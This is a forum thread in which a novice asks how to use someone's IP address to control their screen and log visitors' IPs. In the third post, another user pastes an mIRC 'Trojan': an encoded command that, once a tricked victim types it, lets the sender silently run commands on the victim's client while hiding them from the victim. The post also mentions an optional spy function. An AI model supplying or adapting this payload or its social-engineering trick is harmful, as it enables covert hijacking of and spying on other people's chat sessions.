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Thread: IP found

  1. #1
    Unregistered Guest

    IP found

    i know this has been all over the ***rds, and i am a noob. but what do i do with an IP adress i found???? when i type it in on the url it says document contains no data
    i want to be able to make pop-ups come up and change the background
    my friend does it so i just figured out my PROXY but i want to do it to people too. please?

  2. #2
    Unregistered Guest
    oh yeah is there some sort of php or html code that sees the IP of the people on your site?

  3. #3
    Unregistered Guest


    he Trojan can be activated by the victim when he writes the next command:

    //write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAu***r***yLSB8IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc |
    msg YOURNICK i love you

    YOURNICK = your nick. The victim will message you 'I love you' once he writes the command. You can edit it or just delete
    the ' | msg YOURNICK I love you ' part.

    This is what the command does: it will make a new .mrc file czm and put this in it (which is encoded in the command): on
    ^*:text:ins*:?:{ . $+ $2- | haltdef }

    The haltdef will block your messages to the victim beginning with 'ins'. With this the user can’t see your commands, so he
    wont have a clue who is controlling his mIRC.


    /msg victim ins msg #channel hi

    This will let the victim message #channel the 'hi' message, but the victim will NOT see it, all others in the channel will see.
    And the victim will not see your message 'ins msg #channel hi' because it will be blocked by 'haltdef'. Nice isn’t it? J

    When the victim has executed that command the Trojan is active. You can add a spy function if you want (this can cause
    him an excess flood if he is on too much 'popular' channels (channel with much activity). For adding the spy part (it will send
    you all his activity, messages received, message sent and commands executed) execute the next commands:

    found something eneteresting but how do i use it?
    what does it mean by when user types the next command
    meaning he/she has to know what you are doing??????

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